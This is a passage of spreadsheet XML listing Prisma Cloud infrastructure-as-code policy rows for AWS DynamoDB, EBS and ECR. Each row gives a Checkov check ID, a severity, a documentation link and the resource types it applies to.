https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables</t>
        </is>
      </c>
      <c r="Y749" t="inlineStr"/>
      <c r="Z749" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dynamodb_global_table"]}</t>
        </is>
      </c>
      <c r="AA749" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB749" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC749" t="inlineStr">
        <is>
          <t>CKV_AWS_165</t>
        </is>
      </c>
      <c r="AD749" t="b">
        <v>1</v>
      </c>
      <c r="AE749" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF749" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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49" t="inlineStr">
        <is>
          <t>09745d74-a2aa-4802-a022-33eced685a47</t>
        </is>
      </c>
      <c r="AI749" t="inlineStr"/>
      <c r="AJ749" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK749" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" t="inlineStr"/>
      <c r="B750" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C750" s="2" t="inlineStr"/>
      <c r="D750" t="inlineStr"/>
      <c r="E750" t="inlineStr"/>
      <c r="F750" t="inlineStr"/>
      <c r="G750" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J750" t="inlineStr">
        <is>
          <t>IaC:General:aws-dynamodb</t>
        </is>
      </c>
      <c r="K750" t="inlineStr">
        <is>
          <t>DynamoDB PITR is disabled</t>
        </is>
      </c>
      <c r="L750" t="inlineStr"/>
      <c r="M750" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N750" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O750" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P750" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q750" t="inlineStr"/>
      <c r="R750" t="inlineStr"/>
      <c r="S750" t="inlineStr"/>
      <c r="T750" t="b">
        <v>0</v>
      </c>
      <c r="U750" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V750" t="inlineStr">
        <is>
          <t>IaC:General:aws-dynamodb-table</t>
        </is>
      </c>
      <c r="W750" t="inlineStr">
        <is>
          <t>Ensure Dynamodb point in time recovery (backup) is enabled</t>
        </is>
      </c>
      <c r="X750" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-6</t>
        </is>
      </c>
      <c r="Y750" t="inlineStr"/>
      <c r="Z750" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dynamodb_table"]}</t>
        </is>
      </c>
      <c r="AA750" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB750" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC750" t="inlineStr">
        <is>
          <t>CKV_AWS_28</t>
        </is>
      </c>
      <c r="AD750" t="b">
        <v>1</v>
      </c>
      <c r="AE750" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF750" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>31575632-c4cd-4346-9db4-97b82c6befde</t>
        </is>
      </c>
      <c r="AI750" t="inlineStr"/>
      <c r="AJ750" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK750" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" t="inlineStr"/>
      <c r="B751" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C751" s="2" t="inlineStr"/>
      <c r="D751" t="inlineStr"/>
      <c r="E751" t="inlineStr"/>
      <c r="F751" t="inlineStr"/>
      <c r="G751" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J751" t="inlineStr">
        <is>
          <t>IaC:General:aws-dynamodb</t>
        </is>
      </c>
      <c r="K751" t="inlineStr">
        <is>
          <t>DynamoDB table replica does not use CMK KMS encryption</t>
        </is>
      </c>
      <c r="L751" t="inlineStr"/>
      <c r="M751" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N751" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O751" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P751" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q751" t="inlineStr"/>
      <c r="R751" t="inlineStr"/>
      <c r="S751" t="inlineStr"/>
      <c r="T751" t="b">
        <v>0</v>
      </c>
      <c r="U751" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V751" t="inlineStr">
        <is>
          <t>IaC:General:aws-dynamodb-table-replica</t>
        </is>
      </c>
      <c r="W751" t="inlineStr">
        <is>
          <t>Ensure DynamoDB table replica KMS encryption uses CMK</t>
        </is>
      </c>
      <c r="X751" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-271</t>
        </is>
      </c>
      <c r="Y751" t="inlineStr"/>
      <c r="Z751" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dynamodb_table_replica"]}</t>
        </is>
      </c>
      <c r="AA751" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB751" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC751" t="inlineStr">
        <is>
          <t>CKV_AWS_271</t>
        </is>
      </c>
      <c r="AD751" t="b">
        <v>1</v>
      </c>
      <c r="AE751" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF751" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>406c6932-46e8-49fc-90c3-69026ea857e9</t>
        </is>
      </c>
      <c r="AI751" t="inlineStr"/>
      <c r="AJ751" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK751" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" t="inlineStr"/>
      <c r="B752" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C752" s="2" t="inlineStr"/>
      <c r="D752" t="inlineStr"/>
      <c r="E752" t="inlineStr"/>
      <c r="F752" t="inlineStr"/>
      <c r="G752" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J752" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs</t>
        </is>
      </c>
      <c r="K752" t="inlineStr">
        <is>
          <t>Not all data stored in the EBS snapshot is securely encrypted</t>
        </is>
      </c>
      <c r="L752" t="inlineStr"/>
      <c r="M752" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N752" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O752" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P752" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q752" t="inlineStr"/>
      <c r="R752" t="inlineStr"/>
      <c r="S752" t="inlineStr"/>
      <c r="T752" t="b">
        <v>0</v>
      </c>
      <c r="U752" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V752" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs-snapshot</t>
        </is>
      </c>
      <c r="W752" t="inlineStr">
        <is>
          <t>Ensure all data stored in the EBS Snapshot is securely encrypted</t>
        </is>
      </c>
      <c r="X752" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-7</t>
        </is>
      </c>
      <c r="Y752" t="inlineStr"/>
      <c r="Z752" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ebs_snapshot"]}</t>
        </is>
      </c>
      <c r="AA752" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB752" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC752" t="inlineStr">
        <is>
          <t>CKV_AWS_CUSTOM_3</t>
        </is>
      </c>
      <c r="AD752" t="b">
        <v>1</v>
      </c>
      <c r="AE752" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF752" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>1757fd25-6c31-4c7a-9899-8838150e108f</t>
        </is>
      </c>
      <c r="AI752" t="inlineStr"/>
      <c r="AJ752" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK752" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" t="inlineStr"/>
      <c r="B753" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C753" s="2" t="inlineStr"/>
      <c r="D753" t="inlineStr"/>
      <c r="E753" t="inlineStr"/>
      <c r="F753" t="inlineStr"/>
      <c r="G753" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J753" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs</t>
        </is>
      </c>
      <c r="K753" t="inlineStr">
        <is>
          <t>AWS EBS Snapshot Copy not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L753" t="inlineStr"/>
      <c r="M753" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N753" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O753" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P753" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q753" t="inlineStr"/>
      <c r="R753" t="inlineStr"/>
      <c r="S753" t="inlineStr"/>
      <c r="T753" t="b">
        <v>0</v>
      </c>
      <c r="U753" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V753" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs-snapshot-copy</t>
        </is>
      </c>
      <c r="W753" t="inlineStr">
        <is>
          <t>Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X753" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-103</t>
        </is>
      </c>
      <c r="Y753" t="inlineStr"/>
      <c r="Z753" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ebs_snapshot_copy"]}</t>
        </is>
      </c>
      <c r="AA753" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB753" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC753" t="inlineStr">
        <is>
          <t>CKV_AWS_183</t>
        </is>
      </c>
      <c r="AD753" t="b">
        <v>1</v>
      </c>
      <c r="AE753" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF753" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>0de4c4c3-9fca-4cff-9c0f-e2bcd220868e</t>
        </is>
      </c>
      <c r="AI753" t="inlineStr"/>
      <c r="AJ753" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK753" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" t="inlineStr"/>
      <c r="B754" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C754" s="2" t="inlineStr"/>
      <c r="D754" t="inlineStr"/>
      <c r="E754" t="inlineStr"/>
      <c r="F754" t="inlineStr"/>
      <c r="G754" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J754" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs</t>
        </is>
      </c>
      <c r="K754" t="inlineStr">
        <is>
          <t>AWS EBS Volume not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L754" t="inlineStr"/>
      <c r="M754" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N754" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O754" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P754" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q754" t="inlineStr"/>
      <c r="R754" t="inlineStr"/>
      <c r="S754" t="inlineStr"/>
      <c r="T754" t="b">
        <v>0</v>
      </c>
      <c r="U754" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V754" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs-volume</t>
        </is>
      </c>
      <c r="W754" t="inlineStr">
        <is>
          <t>Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X754" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-109</t>
        </is>
      </c>
      <c r="Y754" t="inlineStr"/>
      <c r="Z754" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ebs_volume"]}</t>
        </is>
      </c>
      <c r="AA754" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB754" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC754" t="inlineStr">
        <is>
          <t>CKV_AWS_189</t>
        </is>
      </c>
      <c r="AD754" t="b">
        <v>1</v>
      </c>
      <c r="AE754" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF754" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>6fdb8007-7c47-4ff5-a95e-ef33c6bda476</t>
        </is>
      </c>
      <c r="AI754" t="inlineStr"/>
      <c r="AJ754" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK754" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 3)</t>
        </is>
      </c>
      <c r="B755" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C755" s="2" t="inlineStr"/>
      <c r="D755" t="inlineStr"/>
      <c r="E755" t="inlineStr"/>
      <c r="F755" t="inlineStr"/>
      <c r="G755" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J755" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs</t>
        </is>
      </c>
      <c r="K755" t="inlineStr">
        <is>
          <t>AWS EBS volumes are not encrypted</t>
        </is>
      </c>
      <c r="L755" t="inlineStr"/>
      <c r="M755" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N755" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O755" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P755" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q755" t="inlineStr">
        <is>
          <t>8.1.4</t>
        </is>
      </c>
      <c r="R755" t="inlineStr">
        <is>
          <t>8.1.4.8</t>
        </is>
      </c>
      <c r="S755" t="inlineStr"/>
      <c r="T755" t="b">
        <v>0</v>
      </c>
      <c r="U755" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V755" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs-volume</t>
        </is>
      </c>
      <c r="W755" t="inlineStr">
        <is>
          <t>Ensure all data stored in the EBS is securely encrypted</t>
        </is>
      </c>
      <c r="X755" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-3-encrypt-ebs-volume</t>
        </is>
      </c>
      <c r="Y755" t="inlineStr"/>
      <c r="Z755" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ebs_volume"]}</t>
        </is>
      </c>
      <c r="AA755" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB755" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC755" t="inlineStr">
        <is>
          <t>CKV_AWS_3</t>
        </is>
      </c>
      <c r="AD755" t="b">
        <v>1</v>
      </c>
      <c r="AE755" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF755" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>47ff5620-39a5-4859-b020-0a8d0d9e192a</t>
        </is>
      </c>
      <c r="AI755" t="inlineStr"/>
      <c r="AJ755" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK755" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" t="inlineStr"/>
      <c r="B756" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C756" s="2" t="inlineStr"/>
      <c r="D756" t="inlineStr"/>
      <c r="E756" t="inlineStr"/>
      <c r="F756" t="inlineStr"/>
      <c r="G756" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J756" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs</t>
        </is>
      </c>
      <c r="K756" t="inlineStr">
        <is>
          <t>Not only encrypted EBS volumes are attached to EC2 instances</t>
        </is>
      </c>
      <c r="L756" t="inlineStr"/>
      <c r="M756" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N756" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O756" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P756" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q756" t="inlineStr"/>
      <c r="R756" t="inlineStr"/>
      <c r="S756" t="inlineStr"/>
      <c r="T756" t="b">
        <v>0</v>
      </c>
      <c r="U756" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V756" t="inlineStr">
        <is>
          <t>IaC:General:aws-ebs-volume,aws-volume-attachment</t>
        </is>
      </c>
      <c r="W756" t="inlineStr">
        <is>
          <t>Ensure that only encrypted EBS volumes are attached to EC2 instances</t>
        </is>
      </c>
      <c r="X756" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-only-encrypted-ebs-volumes-are-attached-to-ec2-instances</t>
        </is>
      </c>
      <c r="Y756" t="inlineStr"/>
      <c r="Z756" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ebs_volume","aws_volume_attachment"]}</t>
        </is>
      </c>
      <c r="AA756" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB756" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC756" t="inlineStr">
        <is>
          <t>CKV2_AWS_2</t>
        </is>
      </c>
      <c r="AD756" t="b">
        <v>1</v>
      </c>
      <c r="AE756" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF756" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>30b1e36c-7860-41e6-b390-773e2163b76a</t>
        </is>
      </c>
      <c r="AI756" t="inlineStr"/>
      <c r="AJ756" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK756" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" t="inlineStr"/>
      <c r="B757" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C757" s="2" t="inlineStr"/>
      <c r="D757" t="inlineStr"/>
      <c r="E757" t="inlineStr"/>
      <c r="F757" t="inlineStr"/>
      <c r="G757" t="b">
        <v>0</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J757" t="inlineStr">
        <is>
          <t>IaC:General:aws-ec2</t>
        </is>
      </c>
      <c r="K757" t="inlineStr">
        <is>
          <t>test10</t>
        </is>
      </c>
      <c r="L757" t="inlineStr"/>
      <c r="M757" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N757" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O757" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P757" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q757" t="inlineStr"/>
      <c r="R757" t="inlineStr"/>
      <c r="S757" t="inlineStr"/>
      <c r="T757" t="b">
        <v>0</v>
      </c>
      <c r="U757" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V757" t="inlineStr">
        <is>
          <t>IaC:General:aws-ec2-tag</t>
        </is>
      </c>
      <c r="W757" t="inlineStr"/>
      <c r="X757" t="inlineStr"/>
      <c r="Y757" t="inlineStr"/>
      <c r="Z757" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ec2_tag"],"conditionQuery":{"attribute":"key","operator":"not_equals","value":"1","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA757" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB757" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC757" t="inlineStr"/>
      <c r="AD757" t="b">
        <v>0</v>
      </c>
      <c r="AE757" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF757" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>150ffaee-631d-462f-86f7-1132469019f1</t>
        </is>
      </c>
      <c r="AI757" t="inlineStr"/>
      <c r="AJ757" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK757" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" t="inlineStr"/>
      <c r="B758" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C758" s="2" t="inlineStr"/>
      <c r="D758" t="inlineStr"/>
      <c r="E758" t="inlineStr"/>
      <c r="F758" t="inlineStr"/>
      <c r="G758" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J758" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecr</t>
        </is>
      </c>
      <c r="K758" t="inlineStr">
        <is>
          <t>Unencrypted ECR repositories</t>
        </is>
      </c>
      <c r="L758" t="inlineStr"/>
      <c r="M758" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N758" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O758" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P758" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q758" t="inlineStr"/>
      <c r="R758" t="inlineStr"/>
      <c r="S758" t="inlineStr"/>
      <c r="T758" t="b">
        <v>0</v>
      </c>
      <c r="U758" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V758" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecr-repository</t>
        </is>
      </c>
      <c r="W758" t="inlineStr">
        <is>
          <t>Ensure that ECR repositories are encrypted using KMS</t>
        </is>
      </c>
      <c r="X758" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-ecr-repositories-are-encrypted</t>
        </is>
      </c>
      <c r="Y758" t="inlineStr"/>
      <c r="Z758" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecr_repository"]}</t>
        </is>
      </c>
      <c r="AA758" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB758" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC758" t="inlineStr">
        <is>
          <t>CKV_AWS_136</t>
        </is>
      </c>
      <c r="AD758" t="b">
        <v>1</v>
      </c>
      <c r="AE758" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF758" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>69480017-0ad0-4127-8b39-4bab0a463f84</t>
        </is>
      </c>
      <c r="AI758" t="inlineStr"/>
      <c r="AJ758" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK758" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" t="inlineStr"/>
      <c r="B759" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C759" s="2" t="inlineStr"/>
      <c r="D759" t="inlineStr"/>
      <c r="E759" t="inlineStr"/>
      <c r="F759" t="inlineStr"/>
      <c r="G759" t="b">
        <v>1</v>
      </c>
      <c r="H7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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J759" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecr</t>
        </is>
      </c>
      <c r="K759" t="inlineStr">
        <is>
          <t>ECR image scan on push is not enabled</t>
        </is>
      </c>
      <c r="L759" t="inlineStr"/>
      <c r="M759" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N759" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O759" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P759" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q759" t="inlineStr"/>
      <c r="R759" t="inlineStr"/>
      <c r="S759" t="inlineStr"/>
      <c r="T759" t="b">
        <v>0</v>
      </c>
      <c r="U759" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V759" t="inlineStr">
        <is>
          <t>IaC:General:aws-ecr-repository</t>
        </is>
      </c>
      <c r="W759" t="inlineStr">
        <is>
          <t>Ensure ECR image scanning on push is enabled</t>
        </is>
      </c>
      <c r="X759" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-8</t>
        </is>
      </c>
      <c r="Y759" t="inlineStr"/>
      <c r="Z759" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ecr_repository"]}</t>
        </is>
      </c>
      <c r="AA759" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB759" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC759" t="inlineStr">
        <is>
          <t>CKV_AWS_163</t>
        </is>
      </c>
      <c r="AD759" t="b">
        <v>1</v>
      </c>
      <c r="AE759" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF759" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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59" t="inlineStr">
        <is>
          <t>f77154ed-b9d4-4cf5-ae49-5b0ac9d0bd81</t>
        </is>
      </c>
      <c r="AI759" t="inlineStr"/>
      <c r="AJ759" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK759" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
